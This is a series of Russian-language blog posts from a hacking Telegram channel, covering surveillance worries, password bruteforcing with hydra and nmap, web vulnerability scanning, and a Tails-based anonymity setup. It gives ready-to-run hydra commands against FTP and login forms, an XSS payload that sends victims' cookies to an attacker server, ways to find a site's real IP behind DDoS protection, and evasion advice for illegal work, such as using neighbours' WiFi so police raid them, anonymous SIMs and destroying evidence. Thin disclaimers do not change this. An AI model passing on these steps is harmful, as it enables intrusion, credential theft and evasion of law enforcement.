Editor

Почему тебе не стать анонимным

2023-06-09T20:34:31.801Z

Приветствую! Анонимность — одна из самых востребованных вещей в наше время. С приходом искусственного интеллекта даже приватность наших действий ставится под огромную угрозу, потому что такие системы могут анализировать и контролировать безграничные потоки данных. Представьте, что будет если подобные инструменты массово начнут применять для установления личности по ту сторону экрана. За нами уже давно следят, шутки об "личном ФСБ'шнике" — далеко не юмор, а суровая реальность. Вопрос стоит только в обработке полученной информации, и я вам докажу это. Целью этой статьи будет сообщить об проблемах, которые не решатся использованием анонимных сетей, сокрытием цифрового отпечатка и так далее. Не забывайте подписываться на наш энтузиастский проект. Всегда будем рады новым людям в чате.

ДИСКЛЕЙМЕР

Вся информация, содержащаяся в данной статье, предоставляется исключительно в целях образования и общего информирования. Автор не несет ответственности за любые действия, которые могут быть предприняты на основе этой информации, а также не гарантирует ее полноту, точность или актуальность.

За тобой уже следят

Читая эту статью, любезный Google тщательно изучает твоё вовлечение, чтобы потом продавать твое внимание рекламодателям за деньги. Вы, наверняка задавались таким вопросом: в чем выгода торговать готовыми в сборке устройствами практически по себестоимости? Мои дорогие, покупая смартфон, вы самостоятельно подписываете контракт, который отбирает у вас собственность на частную жизнь. Основная прибыль всех компаний вытекает из долгосрочной перспективы на монетизацию ваших данных. На просторах сети вы могли встретить сотни видеороликов, где телефон на основе общения рядом с ним выдаёт таргетированную рекламу. И это не миф, это — суровая реальность. Мы все давно под прицелом большого брата и в лучшую сторону ситуация уж точно не изменится. Давайте рассмотрим процессоры Snapdragon, которые каждый раз сливают себе на сервера информацию об: списке установленного программного обеспечения, IP-адресе, уникальном отпечатке устройства и ещё 9 пунктах, которые указаны в источнике. Попрошу заметить, это ДАЖЕ БЕЗ Google! Самое забавное в том, что вся информация передаётся через незащищенный протокол HTTP, который попросту не обладает шифрованием. Спросите, зачем? Чтобы ваш провайдер смог прочитать вашу личность как книгу и записал эту информацию в отдельную папочку, которая повлияет на вашу деанонимизацию. К слову, СОРМ (Система оперативно-розыскных мероприятий) работает практически по аналогичной схеме. А теперь представь, что будет если этот 0.01% который мы затронули будет контролировать ИИ? К слову, сейчас даже старые модели "оригинальных" Nokia идут с "переработанными" прошивками. Раз мы уже говорим на тему телефонов, стоит упомянуть то, что КАЖДЫЙ сайт может узнать когда ты спишь, когда сидишь в туалете, когда летишь в самолёте, etc.. Виной этому — датчик акселерометра. Он используется для определения ориентации экрана, но умельцы научились считывая колебания определять ваш пол по голосу и даже попытались заменить им микрофон.. Благо, у них не получилось, но и исследование далеко не самое свежее. Такие технологии во всю силу применяет компания "Meta" с целью выдачи соответствующей ленты в Instagram, Facebook.
А что насчёт несъёмности аккумулятора? Мы буквально не можем обесточить устройство, оно превращается в настоящий жучок. Не затрагиваю даже baseband, оставим это на следующие материалы подобной тематики.

Твой максимум — потреблять

Предположим, ты — человек, который всегда топил за свободу и приватность. У тебя на устройстве стоит строго opensource Debian система, никакого проприетарного программного обеспечения, все твои диски зашифрованы и имеют стойкие пароли. Что может пойти не так? Все не так радужно. Мы создаем только видимость безопасности, но так же остаемся обычными потребителями, которые никогда не станут углубляться в недры системы. Если я напишу вам что Linux это охренеть как круто и безопасно, вы, скорее всего без раздумий примете эту информацию за действительность, потому что у вас нет выбора=) Все наши знания формируются на анализе информации других людей, для которых это зачастую обычный бизнес. Такое можно было наблюдать с браузером Sphere, об котором буквально трещали с каждого угла, а он оказался ловушкой от спец. служб. Рассмотрим что-то близкое к нам? Например, systemd, который я считаю огромной угрозой, хоть и многие перечат мне. Вкратце: это программа, которая управляет работой компьютера с операционной системой Linux. Она отвечает за запуск и остановку других программ, называемых службами, и следит за их работой. Так же, по стандартам, systemd имеет полностью открытый код. В чем же угроза то? Из-за сложного исходного кода, никто не может провести нормальный аудит безопасности и в systemd находятся эксплойты буквально каждые три месяца! Теперь задумайтесь, действительно нужен ли вам opensource, когда для "обычных потребителей" в роде нас это не является никаким гарантом безопасности? Едем дальше.. Как ты хочешь создавать анонимное пространство, когда весь твой компьютер — закрытый ящик? Да, поговорим о "блобах". Это те самые закрытые уголки, об которых ты никогда не подумаешь. Твоя материнская плата, твой процессор, даже чёртовы драйвера мышки в 99% имеют закрытый исходный код. Intel, NVIDIA и AMD были подвергнуты эксплойтам прямо на уровне железа и при этом не один раз! Как думаешь, было бы круто взять под контроль пол планеты умелым спец. службам Америки найдя всего одну уязвимость? К сожалению, они не раз были замечены за безумной слежкой. И, мы не сможем получить достоверные данные об этом, потому что такая серьёзная информация не будет доступна обычным смертным.

Итоги

Мы рассмотрели одни из основных угроз анонимности, не затрагивая тайминг атаки, TEMPEST, PAA, атаки на звуковых волнах и прочие. Если искусственный интеллект начнут массово применять для контроля всех этих данных — анонимность или даже приватность перестанут существовать вовсе. Предлагаю вам присоединится к нашему чату, чтобы обсудить эту тему вместе. Всем мир!

НАШ КАНАЛ: t.me/hack2day

Атака bruteforce для каждого

2023-05-26T15:11:45.158Z

Приветствую! В этом уроке мы познакомимся с двумя новыми инструментами — hydra и nmap. Также, затронем работу в burpsuite. Совместив их вместе, вы станете умельцами одного из самых опасных методов атаки — bruteforce. Приятного чтения, дальше — больше! Не забывайте подписываться на наш проект, который создан не ради денег. Будем рады новичкам в чате.

ДИСКЛЕЙМЕР

Сканируем IP на открытые порты

Производить это действие мы будем используя утилиту nmap. В качестве подопытного будет мой личный сайт, IP которого уже известен. Сканировать порты нужно для того, чтобы узнать, какие службы работают на этом адресе помимо веб-ресурса, как в нашем случае. Это могут быть принтеры, камеры, базы данных и даже сервера онлайн игр. Расскажу вам забавный кейс: найдя IP нужного мне пользователя в слитой базе данных форума, оказалось что он статичный. Статичный = привязан к одному устройству и не меняется продолжительное время. Казалось бы, что это даст? Просканировав его на открытые порты, мне удалось обнаружить некое устройство, работающее на порту "8080". Этот порт в основном используют для размещения сайтов (HTTP). Перейдя по ссылке "192.168.*.*:8080" меня встретила страница авторизации камеры. Далее дело за малым: две строчки в терминал, 30 минут времени и я наблюдаю как в гостиной убирается какая-то женщина. Естественно, это все вымысел. Вот это я сказочник! Так вот, нам потребуется ввести в терминал подобную команду, заменив значения на свои. Выполнение от имени root!

sudo nmap -p- -sV -sS -T4 192.168.1.1

Теперь давайте разберём её: "-p-" используется для полной проверки всех портов в диапазоне от 0 до 65535. Параметр "-sV" расскажет о версиях сервиса. "-sS" используется для более обширных результатов. Путём лживых рукопожатий с сервером он покажет нам какие порты были отфильтрованы, а какие просто открыты. "-T" — скорость сканирования, от 1 до 5. Чтобы не уронить сервер от флуда запросами, советуется использовать более низкие значения. В основном, команда которую мы рассмотрели выше — база, её нужно записать в отдельный текстовый документ. Если вы хотите пройтись только по популярным портам (более быстрый вариант) — используйте параметр "-F", предварительно убрав "-p-". После успешного выполнения, мы увидим подобную картину (на скриншоте я использовал режим быстрого сканирования):

результат сканирования на открытые порты

Обнаружено много интересных протоколов, но мы остановимся на FTP. Это сервер, на котором зачастую хранятся данные. Его можно сравнить с облаком. Кстати, метод передачи файлов (FTP) давно устарел и не имеет никакого шифрования, хоть и очень часто встречается даже на крупных ресурсах. Настоятельно советую использовать более надёжные варианты!

Знакомство с hydra

И нет, я не оставлю реферальную ссылку по которой скидка на соль -15%=)
Hydra — мощнейший инструмент для брутфорса, с его помощью можно брутить практически все то, что использует для авторизации логин и пароль. Кстати, есть две версии: консольная и графическая. Я буду показывать работу в консольной, но вы можете самостоятельно ознакомиться с графической, благо, там все максимально упростили. С портом мы определились, будем бить 21 (FTP). Но перед этим нам нужно найти то, чем бить=) Речь о базе логинов/паролей. Хочу обратить ваше внимание на то, что это дело индивидуальное. Например, в протоколе RDP (Windows Server) часто используют логин "Administrator", и самое интересное в том, что в отличие от страны он меняется. В Италии — "Administrador", в Швеции — "Administratör". Думаю, суть понятна. Если вы брутите какую-то камеру, обратите внимание на её модель и обратитесь к документации производителя. В 90% там будет указан стандартный логин, это 50% работы.
В Kali Linux по умолчанию есть словарь "rockyou". Он предоставляется в запакованном виде. Чтобы воспользоваться им, введите эти команды:

sudo gunzip /usr/share/wordlists/rockyou.txt.gz cd /usr/share/wordlists/ sudo mv rockyou.txt /home/{username}

Командой "gunzip" мы распаковали архив, далее перешли в директорию с файлом и перенесли его в "домашнюю папку" по пути /home/{username}

читаем содержимое командой "cat", чтобы удостовериться

С паролями разобрались, осталось найти только логин. Мы можем указать целый лист популярных, но как я и советовал выше, точите его под таргет. Вы можете сканировать ресурсы инструментами с прошлой статьи для поиска открытых лог-файлов, которые с огромной вероятностью содержат в себе нужные юзернеймы. Если не знакомы с протоколом/сервисом, воспользуйтесь поисковиками, сконструировав подобный запрос: "{ваш сервис} default credentials".
Крайне советую вам этот гит, на котором размещено все для подобных целей: от списка логинов, до payload'ов. Думаю, достойная закладка в вашем браузере.
В моем случае будет загружен список из 2 логинов, которые я получил ~~в логах сервера~~ интуицией. Выполняем такую команду, заменяя значения на свои:

sudo hydra -L usernames.txt -P rockyou.txt 192.168.0.1 ftp -t 30

bruteforce атака на ftp сервер

Теперь давайте разбирать команду. Параметр "-L" указывает на список логинов. Если мы работаем с целью, логин которой известен — вводим маленькую "-l", после чего указываем юзернейм. С параметром "-P" все аналогично, только речь об паролях. Следующим параметром указывается IP таргета который "пентестим". Далее, протокол. У меня это FTP, вы должны заменить на свой. Кстати, если сервис работает не на обычном порту, вы также можете указать его самостоятельно параметром "-s", последующим значением вводим нужный порт. Один из важных аргументов это "-t", который указывает кол-во потоков. Вы должны понимать, что некоторые конфигурации серверов не всегда выдерживают долбёжку в панель и могут падать/ограничивать количество запросов. Моим оптимальным значением будет 30. Если вы заметили что скорость существенно низкая, нужно понизить этот параметр и попробовать вновь. Скорее всего, сервер обнаружил атаку и установил вам определённые "лимиты". Если вы хотите вывод логов в консоль, добавьте аргумент "-V"
Ура! Команда на целевой таргет полностью готова и её можно сохранять в текстовый документ. При успехе, мы получим строку в консоли с данными.

Брутим логины/пароли на сайте

Это, наверное, будет самый полезный навык в работе. Практически все камеры используют авторизацию через HTTP страницу. В этом примере будет участвовать web-panel известного стиллера, которую я написал самостоятельно и поднял на своем сервере, конечно же. Кстати, вы можете самостоятельно найти несколько тысяч подобных, сконструировав правильный запрос в criminalip.io, Shodan.io и подобных сайтах. Выглядят все они примерно вот так:

стартовая страница авторизации таргета

Единственное, что у нас есть: поля для авторизации и кнопка. Первым делом, нужно отловить сам запрос к серверу во время отправки логина и пароля. Для этого я использую утилиту "Burpsuite". Не будем рассматривать весь функционал, обо нём можно написать книгу да и статья не об этом. Найдите "Burpsuite" через поиск приложений, он предустановлен в системе по умолчанию. Я буду использовать платную версию, но для нашей задачи отличия будут минимальными. Переходим во вкладку "Target" и кликаем "Open browser".

демонстрация вкладки "Tagret"

У нас откроется обычный браузер на основе Chromium. Перейдите на сайт, который нужно "пентестить" и авторизуйтесь любыми данными. Далее, нужно вернуться в burp и найти запрос типа "post". Я выделил его у себя оранжевым цветом. Нам нужно скопировать строчку, в которой передались данные авторизации. У меня она выглядит так: username=admin&password=12345678
Так же нужно скопировать параметр "URL", а именно эту часть: /index.php?auth

пример отловленного post запроса с burpsuite

По итогу, несколько потраченных минут и мы можем начать наш перебор. Воспользуемся все той же гидрой. Из этих данных мы составим такую команду:

$ hydra -L usernames.txt -P rockyou.txt 192.168.0.1 http-post-form "/index.php?auth:username=^USER^&password=^PASS^:Error login or password" -V

Базовые параметры разбирать не будем, так как сделали это выше. В скобочки мы поместили страницу, которая будет обрабатывать запрос. После двоеточия идёт наше "тело запроса", вместо данных авторизации я указал ^USER^&^PASS^ — думаю, логично за что это отвечает. Эти места будут заменяться данными для bruteforce атаки. (^USER^ — логин, ^PASS^ — пароль) Далее, указано сообщение, которое появляется на экране в случае ввода невалидных данных. То есть, если сайт вернёт нам ответ, в котором не будет содержаться "Error login or password" — аккаунт будет сочтён за рабочий. Параметр "-V" будет выводить все попытки авторизации в консоль, (даже неудачные) можете не использовать его.

брутфорс авторизации сайта используя метод http-post-form

Итоги

Теперь, нам не составит труда подключиться к своей камере, если мы забыли пароль=) Мы умеем проверять свои сервера на уязвимость к брутфорсу, свои самописные web-панели, да и в конце концов, школьные электронные журналы, которые создали специально для проверки. Благодарю всех за прочтение, если статья оказалась вам полезной — пожалуйста, подпишитесь на наш Telegram. У нас сейчас даже рекламы нет, это будет лучшая благодарность. Мирного неба!

НАШ КАНАЛ: t.me/hack2day

Сканируем сайт на уязвимости

2023-05-14T18:28:42.074Z

Приветствую! Продолжаем нашу работу с Kali Linux. В этот раз мы научимся поверхностно пентестить сайты. Как мы знаем, люди за всю историю Интернета обнаружили огромное количество уязвимостей. Чтобы проверить их всех вручную, придётся потратить не один день. Благо, существуют "WEB Сканеры", которые автоматически пытаются эксплуатировать все известные накопленные годами уязвимости в наш таргет. Также, мы научимся искать скрытые от посторонних глаз директории, файлы, обходить DDOS защиту и многое другое! Это базовый уровень "скрипт-кидди", которого вполне хватит для проверки своего сайта. Приятного чтения, дальше — больше! Не забывайте подписываться на наш проект, который создан не ради денег. Будем рады новичкам в чате.

ДИСКЛЕЙМЕР

Получение настоящего IP сайта

Сейчас существует много защит от DDoS атак, которые могут помешать нашим тестам. Все они работают по такому принципу: сайт "накрывается" мощностями огромного сервиса, (пр. — Cloudflare, DDoS Guard) цель которого фильтровать ботов и частые запросы. Если мы пройдём проверку на робота = сможем получить возможность взаимодействия с сайтом. Если нет — наш запрос просто проигнорируют. Но, каждый сайт имеет свой личный IP, который 99% не под защитой. То есть, если мы его узнаем, у нас откроется возможность общаться с ним без посредников, напрямую. Сделать можно это многими способами, например: засунуть IP логгер в какой-то обработчик сайта, отправить письмо на несуществующую доменную почту сайта (пр.: nickname@site.com) и вероятно, получить ответ с настоящего IP. Но, не забываем, наш текущий уровень — скрипт-кидди, поэтому будем использовать проверенные и эффективные паблик решения, постепенно повышая свой уровень знаний. Из основных инструментов, могу выделить эти сайты: DNSDumpster, Criminalip, Shodan,intelx, Cenys.

результат поиска настоящего ip сайта используя DNSDumpster

Также, существуют утилиты для дополнительной проверки, одна из них — CloudFail. К слову, если даже IP не удалось обнаружить, это не повод останавливаться. Мы просто потратим немного больше времени на сканирование.

Поиск скрытых файлов / директорий

Это очень важная часть, которую почему-то многие упускают. Мы можем воспользоваться утилитой dirscan, (по умолчанию установлена в Kali Linux) которая в автоматическом режиме попытается найти открытые директории, скрытые файлы, SQL базы, и очень-очень многое другое на нашем сайте. Использование максимально простоe: $ dirsearch -u ссылка-на-сайт.com

Сканируя разные панели нелегальной тематики мне удавалось находить исходники разных скриптов, которые легко можно было бы продать за ~2k$. Некоторые команды вообще оставляли папку с материалом работников в открытом виде, что теоретически, принесло бы мне путёвку в тёплые места, если бы я был злоумышленником=) Но, это все — фантазии, мы ведь люди честные.

поиск скрытых файлов/директорий

Родной брат этой утилиты — subfinder. Он помогает перебирать поддомены сайта. Речь о https://m.vk.com — где "m." является поддоменом и открывает мобильную версию страницы. Очень, очень много сайтов было взломано только благодаря тому, что админы открывали какой-то поддомен на этапе тестировки и не заботились об защите, тем самым подставляли под угрозу весь сайт целиком. Если вам удалось обнаружить что-то интересное, используйте эти две утилиты в связке, в некоторых случаях даже не приходится производить поиск уязвимостей, когда вся нужная информация буквально открыта. Установка лёгкая, (одна строчка) гайд по использованию есть в официальном репозитории GitHub.

поиск поддоменов сайта

Сканирование сайта на WordPress

Сейчас каждый третий сайт работает на этом CMS*. С его помощью можно устанавливать плагины, которые зачастую уязвимы. Чтобы проверить, работает ли сайт на WordPress, достаточно перейти по такой ссылке: ваш-сайт.ru/wp-adminВ успешном случае мы попадаем на страницу авторизации, если нет — можно не проводить дальнейшие действия. К слову, на некоторых сайтах эта страничка умышленно скрывается/переносится на другой адрес, поэтому перед этим действием желательно просканировать скрытые директории/файлы, которые могут дать нам зацепку. Для поиска уязвимостей в плагинах используется утилита wpscan, которая уже установлена в Kali по умолчанию. Перед началом работы с ней, настоятельно рекомендую получить api ключ на официальном сайте, это абсолютно бесплатно. С его помощью, мы сможем произвести более эффективное сканирование. (лимит api ключа: 75 запросов в 24 часа)
После этого, открываем терминал и вводим такую команду. Измените токен.

wpscan --url https://ваш-сайт.ru --api-token wlxP46r7QDhaTkmHOYFDK9qyZNrRP4

поиск уязвимостей в плагинах WordPress

В случае если какой-то плагин уязвим, нам предоставляют ссылку на сайт, где описана угроза и способы её эксплуатации. Также, бывают "ложные обнаружения", сверяйте уязвимые версии плагинов & текущие.

CMS — это система управления, которая позволяет создавать, редактировать и управлять содержимым сайта без необходимости знаний программирования.

Установка WEB Сканера

Стоит упомянуть, что сейчас сканеров просто огромное количество, их тысячи. По моему опыту, наиболее результативным из бесплатных оказался OWASP ZAP, хоть они все имеют свои плюсы и минусы, как-то сравнивать их будет некорректно. Какой-то лучше ищет xss, какой-то — sql инъекции и все в таком роде. В нашем же случае мы получаем золотую середину. Для установки, потребуется скачать "Installer" с их официального сайта. После загрузки, перейдите в терминал и введите такую команду, указав путь к файлу.

$ sudo bash путь-к-загруженому-файлу-.sh

установка OWASP ZAP

Если установка прошла успешно, вы сможете найти утилиту в списке всех приложений. После первого запуска нам предложат обновить некоторые модули, на что мы, естественно, соглашаемся. Займет это примерно 5 минут.

Ищем уязвимости

В сканере мы выбираем режим "Automated Scan". Вы встретите поле для ввода сайта и непонятные функции — "Ajax Spider", "Traditional Spider". Это своеобразные боты, цель которых стоит в сборе ссылок на сайте, которые будут проверяться сканером на уязвимости. "Традиционный" паук будет черпать ссылки прямиком из HTML кода, "AJAX" — парсит с динамических элементов, которые могут быть доступны только после каких-то действий. (например, нажатие на js кнопку, ожидание на странице и пр.) Соответственно, лучшим вариантом будет использовать сразу два, благо, сканер поддерживает такую работу. Если вы хотите произвести самое глубокое сканирование, вам следует установить параметр глубины на "0", как показано на скриншоте ниже. (замедлит работу)
(чтобы перейти в эти настройки, нажмите: Tools --> Options --> AJAX Spider)

работа в OWASP ZAP

Моим таргетом будет специальный сайт, который был создан специально для теста уязвимостей (http://testphp.vulnweb.com/) — вы также можете попрактиковаться на нём. Нажимаем кнопку "Attack" и наблюдаем за процессом. Скорость зависит от количества спаршенных ссылок и мощности железа. В основном, на проверку одного таргета нужно подождать примерно 15 минут. Можно смотреть результаты в режиме реального времени, нажав на кнопку "Alerts". К каждой уязвимости прилагается инструкция по эксплуатации, если её не предоставили/ничего не понятно — не составит труда вбить название в поисковики и изучить информацию. Кстати, они делятся на несколько типов и имеют свой цвет: Критичные (красные), средние (оранжевые), слабые (жёлтые). Ещё существуют информативные (синие), многие их автоматически пропускают, но они тоже могут быть важными, особенно если таргет не популярный.

результат поиска уязвимостей

В моем случае найдено XSS и SQL инъекцию. XSS — это тип атаки, с помощью которой можно внедрить вредоносный код на страницу. Проще говоря, мы буквально можем украсть чужие cookies по ссылке, перекинуть на фишинг с настоящего домена, заменить какую-либо информацию и так далее. SQL инъекция — тип атаки, с помощью которой можно взаимодействовать с базой данных в обход авторизации. Речь о тех самых "дампах", когда взламывают ресурс и выкачивают информацию. В последствии образуются утечки баз данных. Так как статья не об уязвимостях, мы поверхностно затронем XSS атаку, а SQL инъекцию оставим на отдельный материал, это довольно обширная тема.

Немного о XSS атаках

Думаю, стоит начать с того, что их существует 3 вида: рефлективные, хранимые и на основе DOM. Рефлективные — это когда пользователю нужно перейти по какой-то ссылке. Буквально, уязвимость существует, но чтобы с её помощью осуществить атаку, нужно взаимодействовать каким-либо образом с таргетом. В основном, они встречаются в полях для ввода. (пример: магазин с функционалом поиска товаров) Заражённая ссылка будет выглядеть примерно вот так: example.com/search?<script>alert("HACK2DAY");</script> — если жертва перейдёт по ней, она увидит сообщение с тегом нашего канала. Хранимые — это когда уязвимость можно эксплуатировать прямо в какую-либо страницу. Например: пользователь в VK оставил комментарий под постом с текстом <img src=x onerror=this.scr='ваш сервер'?'+document.cookie;> — теперь каждый, кто увидит запись, автоматически отправит свои cookies прямиком злоумышленнику на сервер, я сделаю отдельно об этом статью. Кстати, <script> нужно указывать для того, чтобы сайт воспринимал нашу надпись не как простой текст, а как исполняемый код. На основе DOM идут уже более продвинутые атаки, злоумышленник вставляет вредоносный скрипт в HTML-документ, который уже находится на клиентской стороне и выполняется в браузере пользователя. По сути, такая атака может быть как рефлективной, так и хранимой.

Что такое WAF

Если хорошо посмотреть на скриншот со сканера, вы можете заметить что наша xss уязвимость выполняется не в чистом виде, как я описывал выше, а с изменениями. Речь о частях "</strong>", заглавных буквах и так далее. Очевидно, если есть уязвимость, создатели сайта попытаются её устранить. Для этого они ставят на свои ресурсы "WAF". Это то, что блокирует нежелательные запросы, которые могут подвергнуть сайт к опасности. Наш сканер видоизменил запрос, добавив к нему немного "мусора", который сбил WAF с толку. По итогу, у нас получилось в обход этой защите произвести нужную атаку. Защита есть практически на каждом сайте, очевидно, что вместо "</strong>" как у меня, вы можете встретить рандомные символы, слова и так далее. Не пугайтесь этого.

пример обхода WAF

Итоги

Мы научились искать настоящий ip сайта, скрытые файлы, поддомены. Установили сканер и произвели свою первую проверку сайта на уязвимости. Поверхностно затронули XSS атаку, упомянули об WAF. Надеюсь, было интересно узнать новую информацию, не забывайте заходить в наш чат. Всем мирного неба!

НАШ КАНАЛ: t.me/hack2day

Создание + настройка системы под работы разных цветов

2023-05-02T21:30:44.341Z

Приветствую вас в нашем канале. Прочитав до конца, вы сможете обрести тот самый хороший уровень защиты, которым обладает далеко не каждый человек из тёмного сегмента Интернета. Сразу выделяю слова "ХОРОШИЙ УРОВЕНЬ"! После этих действий вас могут найти*, вопрос в том, смогут ли что-то доказать=)
Если вы ещё не с нами — присоединяйтесь в наше сообщество, будем рады каждому новому участнику. Так же, мы создали чат для общения!

* = сомневаюсь, что такое произойдёт, но упомяну на всякий случай.

ДИСКЛЕЙМЕР

Получение доступа к WiFi соседей

Это очень хитрая уловка, которая сыграет большую роль при "ограблении". Так как я хочу описать статью как более детально, стоит упомянуть данный разворот событий. Фактически, в случае выявления вашего настоящего IP идёт огромная работа с бумагами, чтобы провести "ограбление" в вашей квартире/доме. Как правило, "злоумышленники" получают разрешение на "проникновение" только в одну точку — место, на которое оформлялись услуги провайдера. В нашем случае это дом соседа. Сразу хочу заострить внимание на том, что по приезду на адрес наше устройство быстро обнаружат в сетке и поймут в чем дело. Но это не страшно, потому что мы имеем право потребовать ознакомление с "бумагами" на "ограбление", которые гласят о том, что их выдавали явно не на нашу квартиру/дом. Кстати, в подобных ситуациях нужно тщательно сверять даты, часто совершается много ошибок, которые смогут спасти вашу задницу. В подобной ситуации вы должны сразу же вызвать адвоката, не пытайтесь доказывать свои права самостоятельно, если не "подкованы" в этой сфере. Прикрепляю доказательную базу от юриста, который отлично специализируется на тематике ~~киберпреступлений~~ ограблений и защиты от них=)
Если у вас есть вопросы связанные с законом — обращайтесь: тред на lolzteam.

Вопрос с юридической точки зрения

Естественно, я не нарушаю закон и веду белую деятельность. Помните: взлом WiFi соседей — незаконно. Однако, я могу показать как проверить свою личную сеть на проникновение используя Linux, который мы ставили в прошлой статье. С этим нам поможет утилита "airgeddon". Я считаю что она лучше всего подходит для своих целей новичку, так как обладает обширным списком атак и лёгкая в восприятии. Тем, кому это интересно — посмотрите видео от CyberDen. Не вижу смысла переписывать материал, которого и так полно на просторах Интернета.

Дополнение к WiFi

Вы можете воспользоваться WiFi адаптерами от Alfa. Они обладают очень хорошей дальностью и их цена не особо ударит по карману. Сидя дома можно словить сети за 3-5 KM. (как заявляет производитель) Таким образом легко найти открытую точку доступа (кафе, метро, торговые центры, пр.) и слиться с трафиком обычных прохожих. Главное: не покупайте подделки, используйте только проверенные магазины. Сейчас рынок забит предложениями с "оригинальным продуктом", но на деле, внутренности будут от дешманки за 300 рублей. Альтернативный вариант: использовать 4G модем с симкой. Она должна быть куплена в каком-то переходе и не иметь ничего общего с вами. Пополнять её нужно конфиденциальной криптовалютой/дропом. Чем дальше модем будет от рабочего устройства, тем лучше. Как вариант: открыть ipv6 прокси в каком-то лесу и подключаться к нему через связку сосед + vpn + прокси. Ну, это кому как удобно. Как по мне, обычного соседского WiFi хватает для 90% дел.

Выбор системы

С Windows, очевидно, работать мы не станем. Наша система должна быть безопасной и простой. Тут выбор очевиден — Tails. Весь трафик проходит через сеть TOR, а сама система не сохраняет никаких данных и имеет открытый исходный код. Да, перезагрузили ПК = получили чистый образ. Сложно ли так работать? В первое время — очень. Но спустя недельку, вы будете вводить пароли с закрытыми глазами. Для полной настройки системы мне требуется около трёх минут, учитывая добавления RDP, авторизации на ресурсах. Мы сможем сохранять программы, закладки браузера и прочие файлы.

Tails Image

Стоит ли доверять сети TOR?

Эта тема для обсуждения часто вызывает недоразумения, но, хотел бы выразить своё мнение. Я давно слежу за этой разработкой и все чаще наблюдаю как людей, которые использовали TOR для нелегальной деятельности (речь о крупных преступниках) ловят с, казалось бы, абсурдными доказательствами. Друзья, у нас нет никаких прямых фактов "оккупации" тора силовиками, вся эта информация — догадки общества. TOR — одно из самых старых, адекватных решений которое не требует вложений, согласитесь. Практически всех преступников находят только благодаря их глупости и человеческому фактору. (зарегистрировал аккаунт на свой email, оставил следы в клирнете, использовал одинаковые пароли, связал личности и пр.) Ваш IP рыть будут в самом-самом крайнем случае и то не факт. Если всё же доверия нет, посмотрите в сторону GNUnet — это отличная альтернатива TOR, по моему мнению.

Установка Tails на флешку

Да, система будет находиться на обычной загрузочной флешке, прямо как та, с помощью который вы устанавливаете Windows. Принцип работы ниже.

Вставили флешку --> включили компьютер --> поработали --> выключили компьютер --> извлекли флешку --> при следующем запуске не будет никаких следов использования, чистая флешка = чистая система.

Весь секрет в том, что данные хранятся в оперативной памяти, которая автоматически очищается при выключении ПК. Если к вам постучат грабители в масках, можно отправить флешку поплавать в туалет, тем самым сделать её недееспособной. Грабители смогут обнаружить только чистый SDD/HDD диск, на котором смогут найти только фото котиков и папку "море 2005".
Не забудьте очистить прошлые данные безвозвратно методом "Гурмана"!

Очень важно: не вытягивайте флешку во время работы, не выключайте ПК с розетки. Если грабители будут умны, они сделают "дамп" оперативной памяти и смогут получить слепок вашей прошлой сессии, запомните это!

Итак, чтобы установить Tails на флешку, нам нужно скачать загрузочный образ системы на их официальном сайте и balenaEtcher. (прямая ссылка)
Минимальные требования к системе: 2GB ОЗУ | 8GB Памяти на флешке

Загрузочная страница Tails

После успешной загрузки, присоедините флешку к компьютеру и запустите balenaEtcher. Выберите путь к загруженному ".iso" файлу и саму флешку. У меня показывает треугольник из-за огромного пространства на накопителе, программа считает флешку за полноценный диск. Не обращаем внимание, это никак не повлияет на ход установки. После выбора нажимаем "Flash" и ждём минуты 3-4.
После завершения извлеките флешку. На этом установка закончена.

Процесс установки Tails

Загрузка Tails в качестве системы

Тут ситуация неоднозначна, нам нужно попасть в BIOS и установить флешку в качестве диска для дефолтной загрузки. Проблема в том, что каждый производитель делает разные комбинации клавиш для этого попадания в это меню, поэтому воспользуйтесь поисковиком и сконструируйте подобный запрос:

"How to Enter the BIOS on {ваш производитель материнской платы}"

После попадания в BIOS, найдите вкладку отвечающую за загрузку. В основном, ей присвоено имя "Boot". Вам нужно переместить флешку на первое место/выбрать в качестве загрузчика, ориентируйтесь на интерфейс, который подскажет вам нужные клавиши. У меня была похожая ситуация, как на фото.
После этого действия сохранитесь и перезапустите систему.

Выбор загрузочного устройства в BIOS

Наш первый запуск

Нас встретит меню, в котором нужно выполнить базовую настройку. Вам нужно нажать на "+" и создать пароль администратора, он должен быть надёжным.

Настройка Tails после первого запуска

Также, можно сменить язык на русский/добавить его в клавиатуру. Остальные настройки НЕ ТРОГАЕМ! Если вы не планируете подключаться к общедоступным WiFi, где требуется авторизация в виде браузерной страницы (такое зачастую можно было увидеть в MacDonalds) — оставляйте значение "Enabled" напротив "Unsafe Browser", в ином случае советую отключить. Если вы хотите сделать так, чтобы какая-то информация не удалялась после перезагрузки — создайте "Persistent Storage". Это по сути контейнер, в котором можно хранить приложения/закладки браузера/какие-то файлы и так далее.

Настройка Persistent Storage

Чтобы перейти в настройки, воспользуйтесь поиском приложений и впишите "Configure persistent volume". После открытия нас встретит меню, которое предложит создать пароль. Не пренебрегайте сложностью, это важно.

Создание пароля Persistent Storage (скриншот не мой)

После ввода, нам станет доступно меню, в котором можно выбирать то, что мы хотим сохранять даже после перезагрузки. Я советую выбрать "Additional Software" & "Browser Bookmarks", чтобы сохранять приложения и закладки в TOR браузере. Эта область хорошо защищена используя "LUKS" (дефолтное шифрование систем на Linux) и получить доступ к ней можно только в том случае, если злоумышленнику известен ваш неимоверно сложный пароль. Кстати, вы можете хранить любые файлы в папке "Persistent storage" — но не стоит добавлять сюда то, что сможет быть интересно "злоумышленнику", ведь из-за этого существенно теряется основное преимущество системы — Live режим.

Настройки Persistent Storage (скриншот не мой)

Настройка TOR Browser

Да, работать мы будем именно в нём. Но, вы при желании можете установить абсолютно любой другой. Первым делом, уберите галочки в местах, как на скриншоте. Таким образом мы не будем удалять историю / куки после рестарта браузера. Это бесящая функция, которая в нашем случае абсолютно бесполезна, ведь с каждой перезагрузкой системы у нас удаляются все данные об использовании в целом. Так мы спасём несколько нервных клеток при внезапном закрытии браузера, которое часто происходило у меня в первое время=)

Отключение очистки данных после перезапуска браузера

Далее, устанавливаем расширение "Canvas Blocker". Tor браузер имеет огромный минус — статический фингерпринт. Да, он его подменяет, хоть на этом спасибо. Но, сопоставив наши следы можно выстроить цепочку посещений сайтов. Канвас блокер исправит эту проблему, сделав фингеры динамическими с каждым обновлением страницы. Имеется открытый исходный код на GitHub, все как мы любим. Для установки перейдите на GitHub/магазин расширений Firefox. Имеются гибкие настройки, но в стандартном конфиге все уже сделали за нас.

Настройки Canvas Blocker

